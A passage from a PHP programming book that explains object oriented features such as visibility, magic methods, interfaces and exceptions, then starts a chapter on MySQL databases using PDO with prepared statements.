return $cost;
}
private function getShippingRateForCountry($country) {
// some excellent rate calculating code goes here
// for the example, we'll just think of a number
return 1.2;
}
}
Using a private method makes it clear that this function is designed to be used from
within the class, and stops it from being called from elsewhere in the application.
Making a conscious decision about which functions are public and which aren’t is
an important part of designing object oriented applications.
protected
A protected property or method is similar to a private method, in that it isn’t
available from everywhere. It can be accessed from anywhere within the class it’s
declared in, but, importantly, it can also be accessed from any class which inherits
19
20
PHP Master: Write Cutting-edge Code
from that class. In our Courier example with the private method
getShippingRateForCountry() (called by the calculateShipping() method),
everything works fine, and, in fact, child classes of Courier will also work correctly.
However, if a child class needed to re-implement the calculateShipping() method
to use its own formula, the getShippingRateForCountry() method would be unavailable.
Using protected means that the methods are still unavailable from outside the
class, but that children of the class count as “inside,” and have access to use those
methods or read/write those properties.
Choosing the Right Visibility
To choose the correct visibility for each property or method, follow the decisionmaking process depicted in Figure 1.2.
Figure 1.2. How to choose visibility for a property or method
The general principle is that if there’s no need for things to be accessible outside
of the class, they shouldn’t be. Having a smaller visible area of a class makes it
simpler for other parts of the code to use, and easier for developers new to this code
to understand.1 Making it private can be limiting if we extend this functionality at
1
This includes you, if you’ve slept since you wrote the code.
Object Oriented Programming
a later date, so we only do this if we’re sure it’s needed; otherwise, the property or
method should be protected.
Using Getters and Setters to Control Visibility
In the previous section, we outlined a process to decide which access modifier a
property or method would need. Another approach to managing visibility is to mark
all properties as protected, and only allow access to them using getter and setter
methods. They do exactly as their name implies, allowing you to get and set the
values.
Getter and setter methods look like this:
chapter_01/Courier.php (excerpt)
class Courier {
protected $name;
function getName() {
return $this->name;
}
function setName($value) {
$this->name = $value;
return true;
}
}
This might seem overkill, and in some situations that’s probably a good assessment.
On the other hand, it’s a very useful device for giving traceability to object code
that accesses properties. If every time the property is accessed, it has to come through
the getter and setter methods, this provides a hook, or intercept point, if we need
it. We might hook into these methods to log what information was updated, or to
add some access control logic, or any one of a number of reasons. Whether you
choose to use getter and setter methods, or to access properties directly, the right
approach varies between applications. Showing you both approaches gives you the
tools to decide which is the best fit.
21
22
PHP Master: Write Cutting-edge Code
Underscores and Visibility
In PHP 4, everything was public, and so it was a common convention to prefix
non-public methods and properties with an underscore. You may still see this in
legacy applications, as well as in some current coding standards. While it is unnecessary and some dislike it, the important point is to conform to the coding
standards of the project (more on those in Chapter 8).
Using Magic __get and __set Methods
While we’re on the topic of getters and setters, let’s take a small detour and look at
two magic methods available in PHP: __get() and __set().
These are called when you access a property that doesn’t exist. If that sounds
counterintuitive, let’s see if a code sample can make things clearer:
chapter_01/Courier.php (excerpt)
class Courier
{
protected $data = array();
public function __get($property) {
return $this->data[$property];
}
public function __set($property, $value) {
$this->data[$property] = $value;
return true;
}
}
The code above will be invoked when we try to read from or write to a property
that doesn’t exist in the class. There’s a $data property that will actually hold our
values, but from the outside of the class, it will look as if we’re just accessing
properties as normal. For example, we might write code like this:
$courier = new Courier();
$courier->name = 'Avian Carrier';
echo $courier->name;
Object Oriented Programming
From this angle, we’re unable to see that the $name property doesn’t exist, but the
object behaves as if it does. The magic __get() and __set() methods allow us to
change what happens behind the scenes. We can add any logic we need to here,
having it behave differently for different property names, checking values, or anything else you can think of. All PHP’s magic methods provide us with a place to
put in code that responds to a particular event; in this case, the access of a non-existent property.
Interfaces
An interface is a way of describing the capabilities of an object. An interface specifies
the names of methods and their parameters, but excludes any functioning code.
Using an interface lays out a contract of what a class implementing this interface
will be capable of. Unlike inheritance, we can apply interfaces to multiple classes,
regardless of where they are in the hierarchy. Interfaces applied to one class will
then be inherited by their children.
SPL Countable Interface Example
The interface itself holds only an outline of the functions in the interface; there is
no actual implementation included here. As an example, let’s look at the Countable
interface.2 This is a core interface in PHP, implemented in the SPL (Standard PHP
Library) extension. Countable implements a single function, count(). To use this
interface in our own code, we can implement it as shown here:
chapter_01/Courier.php (excerpt)
class Courier implements Countable
{
protected $count = 0;
public function ship(Parcel $parcel) {
$this->count++;
// ship parcel
return true;
}
public function count() {
2
http://php.net/countable
23
24
PHP Master: Write Cutting-edge Code
return $this->count;
}
}
Since Courier implements Countable in this example, our class must contain a
method with a declaration that exactly matches the method declared in the interface.
What goes inside the method can (and is likely to) differ in each class; we must
simply present the function as declared.
Counting Objects
Using the Countable interface in PHP allows us to customize what happens when
a user calls the core function count() with our object as the subject. By default, if
you count() an object in PHP, you’ll receive a count of how many properties it has.
However, implementing the Countable interface as shown above allows us to hook
into this. We can now take advantage of this feature by writing code like this:
$courier = new Courier();
$courier->ship(new Parcel());
$courier->ship(new Parcel());
$courier->ship(new Parcel());
echo count($courier); // outputs 3
When we implement interfaces, we must always declare the functions defined in
an interface. In the next section, we’ll go on to declare and use our own interfaces.
The Standard PHP Library
This section used the Countable interface as an example of an interface built
into PHP. The SPL module contains some great features, and is well worth a look.
In particular, it offers some useful interfaces, prebuilt iterator classes, and great
storage classes. It’s heavily object oriented, but after reading this chapter, you’ll
be ready to use those ideas in your own applications.
Declaring and Using an Interface
To declare an interface, we simply use the interface keyword, name the interface,
and then prototype the methods that belong to it. As an example, we’ll define a
Trackable interface containing a single method, getTrackInfo():
Object Oriented Programming
chapter_01/Trackable.php
interface Trackable
{
public function getTrackInfo($parcelId);
}
To use this interface in our classes, we simply use the implements keyword. Not
all our couriers can track parcels, and the way they do that will look different for
each one, as they might use different systems internally. If our MonotypeDelivery
courier can track parcels, its class might look similar to this:
chapter_01/MonotypeDelivery.php (excerpt)
class MonotypeDelivery extends Courier implements Trackable
{
public function ship($parcel) {
// put in box
// send and get parcel ID (we'll just pretend)
$parcelId = 42;
return $parcelId;
}
public function getTrackInfo($parcelId) {
// look up some information
return(array("status" => "in transit"));
}
}
We can then call the object methods as we usually would; the interface simply
mandates that these methods exist. This allows us to be certain that the function
will exist and behave as we expect, even on objects that are not related to one another.
Identifying Objects and Interfaces
Interfaces are great—they let us know which methods will be available in an object
that implements them. But how can we know which interfaces are implemented?
At this point, we return to type hinting and the instanceOf operator again. We used
them before to check if objects were of a particular type of class, or inherited from
that class. These techniques also work for interfaces. Exactly as when we discussed
25
26
PHP Master: Write Cutting-edge Code
polymorphism, where a single object will identify as its own class and also the class
of any ancestor, that same class will identify as any interface that it implements.
Look back at the previous code sample, where our MonotypeDelivery class inherited
from Courier and implemented the Trackable interface. We can instantiate an object
of type MonotypeDelivery, and then interrogate it:
$courier = new MonotypeDelivery();
if($courier instanceOf Courier) {
echo "I'm a Courier\n";
}
if($courier instanceOf MonotypeDelivery) {
echo "I'm a MonotypeDelivery\n";
}
if($courier instanceOf Parcel) {
echo "I'm a Parcel\n";
}
if($courier instanceOf Trackable) {
echo "I'm a Trackable\n";
}
/*
Output:
I'm a Courier
I'm a MonotypeDelivery
I'm a Trackable
*/
As you can see, the object admits to being a Courier, a MonotypeDelivery, and a
Trackable, but denies being a Parcel. This is entirely reasonable, as it isn’t a Parcel!
Exceptions
Exceptions are an object oriented approach to error handling. Some PHP extensions
will still raise errors as they used to; more modern extensions such as PDO 3 will
3
PDO stands for PHP Database Objects, and you can read about it in Chapter 2.
Object Oriented Programming
instead throw exceptions. Exceptions themselves are objects, and Exception is a
built-in class in PHP. An Exception object will contain information about where
the error occurred (the filename and line number), an error message, and (optionally)
an error code.
Handling Exceptions
Let’s start by looking at how to handle functions that might throw exceptions. We’ll
use a PDO example for this, since the PDO extension throws exceptions. Here we have
code which attempts to create a database connection, but fails because the host
“nonsense” doesn’t exist:
$db = new PDO('mysql:host=nonsense');
Running this code gives a fatal error, because the connection failed and the PDO
class threw an exception. To avoid this, use a try/catch block:
try {
$db = new PDO('mysql:host=nonsense');
echo "Connected to database";
} catch (Exception $e) {
echo "Oops! " . $e->getMessage();
}
This code sample illustrates the try/catch structure. In the try block, we place
the code we’d like to run in our application, but which we know may throw an exception. In the catch block, we add some code to react to the error, either by
handling it, logging it, or taking whatever action is appropriate.
Note that when an exception occurs, as it does here when we try to connect to the
database, PHP jumps straight into the catch block without running any of the rest
of the code in the try block. In this example, the failed database connection means
that we never see the Connected to database message, because this line of code
fails to get a run.
No Finally Clause
If you’ve worked with exceptions in other languages, you might be used to a
try/catch/finally construct; PHP lacks the additional finally clause.
27
28
PHP Master: Write Cutting-edge Code
Why Exceptions?
Exceptions are a more elegant method of error handling than the traditional approach
of raising errors of varying levels. We can react to exceptions in the course of execution, depending on how severe the problem is. We can assess the situation and
then tell our application to recover, or bail out gracefully.
Having exceptions as objects means that we can extend exceptions (and there are
examples of this shortly), and customize their data and behavior. We already know
how to work with objects, and this makes it easy to add quite complicated functionality into our error handling if we need it.
Throwing Exceptions
We’ve seen how to handle exceptions thrown by built-in PHP functions, but how
about throwing them ourselves? Well, we certainly can do that:
// something has gone wrong
throw new Exception('Meaningful error message string');
The throw keyword allows us to throw an exception; then we instantiate an
Exception object to be thrown. When we instantiate an exception, we pass in the
error message as a parameter to the constructor, as shown in the previous example.
This constructor can also accept an optional error code as the second parameter, if
you want to pass a code as well.
Extending Exceptions
We can extend the Exception object to create our own classes with specific exception
types. The PDO extension throws exceptions of type PDOException, for example,
and this allows us to distinguish between database errors and any other kind of
exception that could arise. To extend an exception, we simply use object inheritance:
class HeavyParcelException extends Exception {}
We can set any properties or add any methods we desire to this Exception class.
It’s not uncommon to have defined but empty classes, simply to give a more specific
type of exception, as well as allow us to tell which part of our application encountered a problem without trying to programmatically read the error message.
Object Oriented Programming
Autoloading Exceptions
Earlier, we covered autoloading, defining rules for where to find classes whose
definition hasn’t already been included in the code executed in this script. Exceptions are simply objects, so we can use autoloading to load our exception classes
too.
Having specific exception classes means we can catch different exception types,
and we’ll look at this in the next section.
Catching Specific Types of Exception
Consider this code example, which can throw multiple exceptions:
chapter_01/HeavyParcelException.php (excerpt)
class HeavyParcelException extends Exception {}
class Courier{
public function ship(Parcel $parcel) {
// check we have an address
if(empty($parcel->address)) {
throw new Exception('Address not Specified');
}
// check the weight
if($parcel->weight > 5) {
throw new HeavyParcelException('Parcel exceeds courier➥
limit');
}
// otherwise we're cool
return true;
}
}
The above example shows an exception, HeavyParcelException, which is empty.
The Courier class has a ship() method, which can throw both an Exception and
a HeavyParcelException.
Now we’ll try this code. Note the two catch blocks:
29
30
PHP Master: Write Cutting-edge Code
$myCourier = new Courier();
$parcel = new Parcel();
// add the address if we have it
$parcel->weight = rand(1,7);
try {
$myCourier->ship($parcel);
echo "parcel shipped";
} catch (HeavyParcelException $e) {
echo "Parcel weight error: " . $e->getMessage();
// redirect them to choose another courier
} catch (Exception $e) {
echo "Something went wrong. " . $e->getMessage();
// exit so we don't try to proceed any further
exit;
}
In this example, we begin by instantiating both Courier and Parcel objects. The
parcel object should have both an address and a weight; we check for these when
we try to ship it. Note that this example uses a little rand() function to produce a
variety of parcel weights! This is a fun way to test the code, as some parcels are too
heavy and trigger the exception.
In the try block, we ask the courier to ship the parcel. With any luck, all goes well
and we see the “parcel shipped” message. There are also two catch blocks to allow
us to elegantly handle the failure outcomes. The first catch block specifically catches
the HeavyParcelException; any other kind of exception is then caught by the more
general second catch block. If we’d caught the Exception first, all exceptions would
end up being caught here, so make sure that the catch blocks have the most specific
type of exception first.
What’s actually happening here is that the catch block is using typehinting to distinguish if an object is of an acceptable type. So all we learned earlier about typehinting and polymorphism applies here; a HeavyParcelException is also an
Exception.
In this example, the exceptions are being thrown inside the class, but caught further
up the stack in the code that called the object’s method. Exceptions, if not caught,
will return to their calling context, and if they fail to be caught there, they’ll continue
to bubble up through the call stack. Only when they get to the top without being
caught will we see the fatal error Uncaught Exception.
Object Oriented Programming
Setting a Global Exception Handler
To avoid seeing fatal errors where exceptions have been thrown and our code failed
to catch them, we can set a default behavior for our application in this situation.
To do this, we use a function called set_exception_handler(). This accepts a
callback as its parameter, so we can give the name of a function to use, for example.
An exception handler will usually present an error screen to the user—much nicer
than a fatal error message!
A basic exception handler would look similar to this:
function handleMissedException($e) {
echo "Sorry, something is wrong. Please try again, or contact us➥
if the problem persists";
error_log('Unhandled Exception: ' . $e->getMessage()
. ' in file ' . $e->getFile() . ' on line ' . $e->getLine());
}
set_exception_handler('handleMissedException');
throw new Exception('just testing!');
This shows an exception handler, and then the call to set_exception_handler()
to register this function to handle uncaught exceptions. Usually, this would be declared and set near the beginning of your script, or in a bootstrap file, if you have
one.
Default Error Handler
In addition to using set_exception_hander() to handle exceptions, PHP also
has set_error_handler() to deal with errors.
Our example exception handler used the error_log() function to write information
about the error to the PHP error log. The logfile entry looked like this:
[13-Jan-2012 11:25:41] Unhandled Exception: just testing! in file➥
/home/lorna/.../exception-handler.php on line 13
31
32
PHP Master: Write Cutting-edge Code
Working with Callbacks
Having just shown the use of a function name as a callback, it’s a good time to look
at the other options available to us. Callbacks are used in various aspects of PHP.
The set_exception_handler() and set_error_handler() functions are good examples. We can also use callbacks, for example, in array_walk()—a function where
we ask PHP to apply the same operation, specified using a callback, to every element
in an array.
Callbacks can take a multitude of forms:
■ a function name
■ a class name and method name, where the method is called statically
■ an object and method name, where the method is called against the supplied
object
■ a closure (a function stored in a variable)
■ a lambda function (a function declared in-place)
Callbacks are one of the times when it does make a lot of sense to use an anonymous
function. The function we declare for our exception handler won’t be used from
anywhere else in the application, so there’s no need for a global name. There’s more
information about anonymous functions on the related page in the PHP Manual.4
More Magic Methods
Already in this chapter, we’ve witnessed a few magic methods being used. Let’s
quickly recap on the ones we’ve seen, in Table 1.1.
Table 1.1. Magic Methods: A Summary
Function
4
Runs when …
__construct()
an object is instantiated
__destruct()
an object is destroyed
__get()
a nonexistent property is read
__set()
a nonexistent property is written
__clone()
an object is copied
http://php.net/manual/en/functions.anonymous.php
Object Oriented Programming
When we define these functions in a class, we define what occurs when these events
happen. Without them, our classes exhibit default behavior, and that’s often all we
need. There are additional magic methods in PHP, and in this section we’ll look at
some of the most frequently used.
Using __call() and __callStatic()
The __call() method is a natural partner to the __get() and __set() methods we
saw in the section about access modifiers. Where __get() and __set() deal with
properties that don’t really exist, __call() does the same for methods. When we
call a method that isn’t declared in the class, the __call() method is called instead.
We’ve been using a Courier class with a ship() method, but what if we also wanted
to call sendParcel() for the same functionality? When we work with legacy systems,
we can often be replacing one piece of an existing system at a time, so this is a likely
enough situation. We could adapt our courier’s class definition to include a
sendParcel() method, or we could use __call(), which would look like:
chapter_01/Courier.php (excerpt)
class Courier {
public $name;
public function __construct($name) {
$this->name = $name;
return true;
}
public function ship($parcel) {
// sends the parcel to its destination
return true;
}
public function __call($name, $params) {
if($name == 'sendParcel') {
// legacy system requirement, pass to newer send() method
return $this->send($params[0]);
} else {
error_log('Failed call to ' . $name . ' in Courier class');
return false;
}
}
}
33
34
PHP Master: Write Cutting-edge Code
All this magic definitely leaves scope for creating some code masterpieces, making
it impossible for any normal person to work with them! When you use __call()
instead of declaring a method, it will be unavailable when the IDE autocompletes
method names for us. The method will fail to show up when we check if a function
exists in a class, and it will be hard to trace when debugging. For this situation,
where there’s old code calling to old method names, you could argue that it’s actually
a feature to not have the function visible—it makes it even clearer that code we
write today shouldn’t be making use of it.
As with all software design, there are no hard and fast rules, but you can definitely
have too much of a good thing when it comes to having “pretend” methods in your
class, so use this feature in moderation.
In addition to the __call() method, as of PHP 5.3 we also have __callStatic().
This does what you might expect it to do. It will be called when we make a static
method call to a method that doesn’t exist in this class. Exactly like __call(),
__callStatic() accepts the method name and an array of its arguments.
Printing Objects with __toString()
Have you ever tried using echo() with an object? By default, it simply prints “Object,” giving us very little. We can use the __toString() magic method to change
this behavior, or, to make our Courier class—for example—print a better description,
we could type:
chapter_01/Courier.php (excerpt)
class Courier {
public $name;
public $home_country;
public function __construct($name, $home_country) {
$this->name = $name;
$this->home_country = $home_country;
return true;
}
public function __toString() {
return $this->name . ' (' . $this->home_country . ')';
}
}
Object Oriented Programming
To use the functionality, we just use our object as a string; for example, by echoing
it:
$mycourier = new Courier('Avian Services', 'Australia');
echo $mycourier;
This can be a very handy trick when an object is output frequently in the same
format. The templates can simply output the object, and it knows how to convert
itself to a string.
Serializing Objects
To serialize data in PHP means to convert it into a text-based format that we can
store, for example, in a database. We can use it on all sorts of data types, but it’s
particularly useful on arrays and objects that can’t natively be written to database
columns, or easily sent between systems without a textual representation of themselves.
Let’s first inspect a simple object using var_dump(), and then serialize it, to give
you an idea of what that would look like:
$mycourier = new Courier('Avian Services', 'Australia');
var_dump($mycourier);
echo serialize($mycourier);
/*
output:
object(Courier)#1 (2) {
["name"]=>
string(14) "Avian Services"
["home_country"]=>
string(9) "Australia"
}
O:7:"Courier":2:{s:4:"name";s:14:"Avian Services";s:12:➥
"home_country";s:9:"Australia";}
*/
When we serialize an object, we can unserialize it in any system where the class
definition of the object is available. There are some object properties, however, that
35
36
PHP Master: Write Cutting-edge Code
we don’t want to serialize, because they’d be invalid in any other context. A good
example of this is a resource; a file pointer would make no sense if unserialized at
a later point, or on a totally different platform.
To help us deal with this situation, PHP provides the __sleep() and __wakeup()
methods, which are called when serializing and unserializing, respectively. These
methods allow us to name which properties to serialize, and fill in any that aren’t
stored when the object is “woken.” We can very quickly design our classes to take
advantage of this. To illustrate, how about adding a file handle to our class for logging
errors?
chapter_01/Courier.php (excerpt)
class Courier {
public $name;
public $home_country;
public function __construct($name, $home_country) {
$this->name = $name;
$this->home_country = $home_country;
$this->logfile = $this->getLogFile();
return true;
}
protected function getLogFile() {
// error log location would be in a config file
return fopen('/tmp/error_log.txt', 'a');
}
public function log($message) {
if($this->logfile) {
fputs($this->logfile, 'Log message: ' . $message . "\n");
}
}
public function __sleep() {
// only store the "safe" properties
return array("name", "home_country");
}
public function __wakeup() {
// properties are restored, now add the logfile
$this->logfile = $this->getLogFile();
Object Oriented Programming
return true;
}
}
Using magic methods in this way allows us to avoid the pitfalls of serializing a resource, or linking to another object or item that would become invalid. This enables
us to store our objects safely, and adapt as necessary to their particular requirements.
Objective Achieved
During the course of this chapter, we’ve come into object oriented theory, and discussed how it can be useful to associate a set of variables and functionality into one
unit. We covered basic use of properties and methods, how to control visibility to
different class elements, and looked at how we can create consistency between
classes using inheritance and interfaces. Exception handling gives us an elegant
way of dealing with any mishaps in our applications, and we also looked at magic
methods for some very neat tricks to make development easier. At this point, we’re
ready to go on and use object oriented interfaces in the extensions and libraries we
work with in our day-to-day lives, as well as build our own libraries and applications
this way.
37
Chapter
2
Databases
Databases and data storage are key components of any dynamic web application.
It’s important to gain an overview of when to use a database, and especially how
to use the PDO (PHP Data Object) extension to connect to a database. The PDO extension examples we’ll be going through use MySQL, probably the most popular
structured query language used to communicate with databases. However, PDO can
be used in the same way with many database platforms, so regardless of what kind
of database your project contains, there’ll be plenty of information for you to soak
up here.
We’re also going to investigate some handy tips for good database design, so that
you can maximize your application’s efficiency and performance.
Persistent Data and Web Applications
There are two reasons why we’d usually store information in a web application,
rather than merely provide our content to a web user as a simple static page:
1. Because the content is dynamic, it can be constantly updated and edited, or
drawn from another system.
40
PHP Master: Write Cutting-edge Code
2. You can present user-specific content to website visitors.
The first point might be relevant to, for example, a CMS (Content Management
System) or similar application. The second point would arise when a website contains a member’s area, accessed through login and password fields, and personalized
elements are added—such as an output greeting that user by their name, and displaying information specific to them (think a View Profile or Edit Profile page).
Increasingly, we’re moving away from a world where pages are just created and
then published; instead, the Web is populated by systems that manage its content
through web-based tools. Even a page without a logged-in user will draw elements
from a database to display content, navigation, and other elements. The days of
using PHP purely to email a contact form are most definitely behind us!
When we work with user data, we’re really working around the stateless nature of
the Web. This means that there’s no link between consecutive requests by the same
user; each incoming request is just a request, one that the server takes on board and
responds to using only the information that arrived with that request, in order to
work out what to do. This is in direct contrast to a traditional desktop application,
where the user logs in once, and the connection between the client and the server
remains in place for the duration of the session. Working with the Web now means
we need to learn to store and load data efficiently and appropriately for each request
made to the server.
Choosing How to Store Data
We have four main options for storing data:
1. Text files
These are ideal for small amounts of data that are
updated infrequently (such as configuration files),
and for logging events or errors in your application.
2. Session data
For data that is only needed for the next request or
for the duration of this visit, we can store information in the user’s session. Using the session for temporary data is ideal, as it saves us from potentially
recording too much data, or having to add functionality to clean up data that’s no longer needed.
Databases
3. Relational database
This is the main type of storage we’ll be covering in
this chapter, along with how to access data using
PDO. Relational databases are perfect for data which
is of a known structure, such as tables containing
users (who will all have an ID, a first name, a last
name, a website URL, and so on).
4. NoSQL database
The NoSQL (generally agreed to stand for “Not Only
SQL”) databases are an established set of alternative
database technologies, such as CouchDB,1 MongoDB,2 and Cassandra.3 These are best used for data
of an unknown or flexible structure; they were originally designed for storing documents that differ
greatly from one another.
As we’ve stated, this chapter will focus on relational databases—they are a natural
partner to PHP in today’s web applications.
Building a Recipe Website with MySQL
In our example, we’re going to build a recipe website presenting dynamic content
to the user. First, we’ll need to create a database; let’s call it “recipes.” Next, we can
create a couple of tables with which to populate our database and contain the content
our site will present. For a start, let’s have a table to hold all our recipes, and another
one containing recipe categories. Figure 2.1 gives a picture of how our basic table
structure will look.
1
http://couchdb.apache.org/
http://www.mongodb.org/
3
http://cassandra.apache.org/
2
41
42
PHP Master: Write Cutting-edge Code
Figure 2.1. A basic relationship diagram between our first two tables
Each recipe will belong in one category, so we give the category a unique ID column,
and refer to it from the recipes column. (We will look in more detail at designing
databases later in this chapter.)
Creating the Tables
Here are the SQL commands that will generate the tables. You can type them into
the MySQL command line, or use a graphical tool such as phpMyAdmin,4 where
you can enter the following under the SQL tab:
CREATE TABLE recipes (
id INT PRIMARY KEY AUTO_INCREMENT,
name VARCHAR( 400 ) NOT NULL,
description TEXT,
category_id INT,
chef VARCHAR(255),
created DATETIME);
CREATE TABLE categories (
id INT PRIMARY KEY AUTO_INCREMENT,
name VARCHAR( 400 ) NOT NULL);
You’ll notice that we’ve given id columns to both tables, and marked them as primary
keys. It is good practice to provide a unique identifier within a table—so that we
have an easy way to find a particular record—and adding a primary key value to a
4
http://www.phpmyadmin.net/
Databases
column will take care of this. Here, we’ve added a unique number as an id, which
makes it easy for MySQL to hunt down the record we’re looking for.
An alternative approach is to add a unique constraint on one column and make that
the primary key. For example, we could have said that the recipe.name column must
be unique. With a unique name column, there’s no need for an id column at all, as
we’ll identify our records purely by their name. It does mean, however, that changing
the recipe name will cause a problem, especially if other tables use this column to
refer to particular records. Using strings to match keys is a bit slower than using
numeric ids, which is why it’s common practice to have a column with an int (integer)
value as the primary key, and then adding an auto_increment value to it, like the
ones used in these examples. (We’ll explain auto incrementation shortly.)
The tables we’ve created provide some structure, but we can also enter some data
into them to get us started. We hope the food-related examples won’t make you feel
too hungry!
INSERT INTO categories (name) values ('Starter');
INSERT INTO categories (name) values ('Main');
INSERT INTO categories (name) values ('Pudding');
We defined our categories table with two columns—id and name—but we’re only
supplying one of them in our INSERT statements: name. So what’s happening here?
In fact, this is the auto_increment value going to work that we specified when we
created the table. Even though we haven’t supplied a value for the id column, MySQL
will automatically apply a unique number to this column, increasing that number
with each new row that’s created.5
When the table is newly built, the first value to go into this column will be 1. The
next value will be 2, and so on. However, the current highest number is actually
stored as a table property. You might, for instance, insert five rows into the table;
MySQL will give them id values of 1, 2, 3, 4, and 5. At some point, you could decide
you don’t need them and remove them all; then, at a later point, insert more rows
into what would be an empty table. These new rows will begin with an id value of
6 because the table remembers what number it was up to before you deleted that
5
There are equivalents to auto_increment in most other database platforms.
43
44
PHP Master: Write Cutting-edge Code
first set of rows. This is auto incrementation at work, and we can see this automatic
numbering in action again when we add rows to the recipes table:
INSERT INTO recipes (name, description, category_id, chef, created)
values ('Apple Crumble', 'Traditional pudding with crunchy crumble
layered over sweet fruit and baked', 3, 'Lorna', NOW());
INSERT INTO recipes (name, description, category_id, chef, created)
values ('Fruit Salad', 'Combination of in-season fruits, covered
with fruit juice and served chilled', 3, 'Lorna', NOW());
These queries use the NOW() function in MySQL to insert the current date and time
into a table column; in this case, our created column. When we work with PHP, we
can use this handy automatic tool instead of manually formatting the date and time
data to pass in to our queries.
PHP Database Objects
If you’ve used PHP with MySQL before, you may have used the mysql or mysqli
libraries to connect to your database, using functions such as mysql_connect().
For many years, this was a standard way of connecting to MySQL databases, and
there were equivalents for other database platforms.
These libraries were used directly and formed the basis of libraries and frameworks
for countless PHP applications. The disadvantage was that each extension differed
slightly from the others, so making code that could easily move between database
platforms was tricky. Although those database-specific libraries are still active and
well-maintained, this chapter will focus on using the more modern PDO extension.
The PDO extension was created to give us a unified set of functionality when talking
to database platforms of all kinds. It’s an object oriented extension that was introduced with PHP 5, taking advantage of many features introduced into the language
at that time.
Know Your OOP
If you’re new to object oriented coding, and you’re yet to read through Chapter 1,
now is a good time to check it out for more information on using this approach.
One problem not solved by PDO, however, is the difference in SQL syntax that occurs
between different database platforms; hence, this extension is not quite the silver
Databases
bullet that it can seem upon first glance. PDO will connect and talk to an assortment
of database platforms, but we may still have to adapt the SQL that we send in order
to make a truly platform-independent application.
PDO is an abstraction layer, meaning it’s built between the PHP we write and the
way PHP connects to the databases. It gives us some very elegant functionality for
performing queries and iterating over data sets. Let’s investigate the technical details
of how to use PDO.
Connecting to MySQL with PDO
We connect to databases with PDO by instantiating a new PDO object and passing in
a DSN, plus the user name and password, if needed. DSN (Data Source Name)
consists of the data structures used to describe the actual connection. To connect
to the database we created (named recipes, using localhost as the host), the connection
would be made using the following PHP code:
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
Remember to replace the values in this code with your own username and password.
Here we’re using php-user and secret, respectively; if you’ve set up a local server
environment with software such as Xampp these values might by default be set to
root and have no password value. Alternatively, you may have changed them when
you installed and configured your server environment.
If PHP can connect to the database, there will be a shiny new PDO object now stored
in the $db_conn variable. If PHP is unable to connect, the PDO object creation fails,
and causes a PDOException to be thrown. Our PDO code should therefore wrap the
connection step in a try/catch block, and look for PDOException objects that would
indicate we failed to connect:
chapter_02/PDOException.php
try {
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
} catch (PDOException $e) {
echo "Could not connect to database";
}
45
46
PHP Master: Write Cutting-edge Code
Selecting Data from a Table
With the PDO object created, we can now retrieve data. To start with, how about a
list of the recipes in our database? When we select data with PDO, we create a
PDOStatement object. This represents our query, and allows us to fetch results. For
a basic query, we can use the PDO::query() method:
chapter_02/PDOStatement.php
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
// perform query
$stmt = $db_conn->query('SELECT name, chef FROM recipes');
// display results
while($row = $stmt->fetch()) {
echo $row['name'] . ' by ' . $row['chef'] . "\n";
}
Using ORDER to Sort Results
When selecting data from MySQL this way, we’ll have the records returned in an
undefined order; usually, this will be the order they were inserted in. For a more
polished application, we might add the following command to the end of our
query: ORDER BY created DESC. This will return the results in descending
chronological order, and means we’ll always see the newest recipes first.
The example above made use of the PDOStatement::fetch() method, which can
handle a number of modes for fetching data.
Data Fetching Modes
In the previous example, we saw how PDOStatement is used to represent our query
and its dataset. Each time we call the fetch() method, we receive another row from
the set. We can also use fetchAll() to retrieve all the rows at once. Both methods
accept the fetch_style argument, which defines how the result set is formatted.
PDO provides us with some handy constants to use with this:
Databases
■ PDO::FETCH_ASSOC does what you see in the while loop previously; it returns
an array with the keys set to the column names.
■ PDO::FETCH_NUM also returns an array, but this time with numeric keys.
■ PDO::FETCH_BOTH (the default value) combines both PDO::FETCH_ASSOC and
PDO::FETCH_NUM to give an array that has every value twice—once with its column
name and once with a numeric index.
■ PDO::FETCH_CLASS returns an object of the named class instead of an array, with
the values set into properties named after the columns.
To see the results returned by, say, PDO::FETCH_ASSOC, type in the following code:
$result = $stmt->fetch(PDO::FETCH_ASSOC);
print_r($result);
You should see an array returned on screen with the keys as column names and the
values as corresponding column entries.
Which of these constants you use depends on your application, but knowing that
you can diversify to fit your needs is important. It is quite common to use the default
and access the array elements with the column names.
Parameters and Prepared Statements
In our first PDO example, we simply selected all the rows from a table. It is more
common, though, to fetch a specific record, or a list of results matching some criteria.
Let’s fetch details of the particular recipe that has an id of 1.
To do this, we’ll use a prepared statement. This is to say we’ll tell MySQL what
the statement is going to be and which parts of it are variable. Then we ask MySQL
to actually execute the statement, using the variable(s) we supply. In fact, when we
run PDO::query(), it combines the prepare and execute steps for us, as there’s no
need to do them separately. Here’s the example code:
chapter_02/prepared_statement.php
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
47
48
PHP Master: Write Cutting-edge Code
// query for one recipe
$sql = 'SELECT name, description, chef
FROM recipes
WHERE id = :recipe_id';
$stmt = $db_conn->prepare($sql);
// perform query
$stmt->execute(array(
"recipe_id" => 1)
);
$recipe = $stmt->fetch();
There are a few activities going on here, so let’s look at them in turn.
First, we create the PDOStatement by passing the SQL into the prepare() method.
Look closely at this SQL and you might see something a bit odd. The colon in front
of :recipe_id indicates that this is a placeholder; we’ll replace the placeholder
with a real value before we actually run this query.
Then we execute() the query. When we do this, we must pass in values for each
of the placeholders in the string we passed to the prepare() method. Since we’re
using named placeholders, we create an array with as many elements as there are
placeholders. Each placeholder has a matching array element with its name as the
key, and the value we want to use to replace it.
Since we know there will only be one row returned, we can call fetch() once instead
of looping.
Building the SQL Statement
In the previous example, we defined a separate $sql variable to hold the string
to pass into PDO::prepare. This approach can make it easier to read the code,
and helps if you need to build a more complex query. It can also aid in debugging,
as you can easily check what was passed into prepare().
Placeholders don’t need to have names—you can also use the ?? character to hold
the place for a variable as an unnamed placeholder. Again, there can be many of
these in the SQL that you use to create the PDOStatement, and we pass the values
Databases
into execute() as an array, but in this case, listing the values in the order they appear
in the query. It’s easier to illustrate this with an example:
// fetch all pudding recipes from Lorna
$sql = 'SELECT name, description, chef
FROM recipes
WHERE chef = ?
AND category_id = ?';
$stmt = $db_conn->prepare($sql);
// perform query
$stmt->execute(array("Lorna", 3);
$recipe = $stmt->fetch();
If your queries become large or complex, named placeholders can make it easier to
maintain your code. The named keys in the array passed to execute() make it
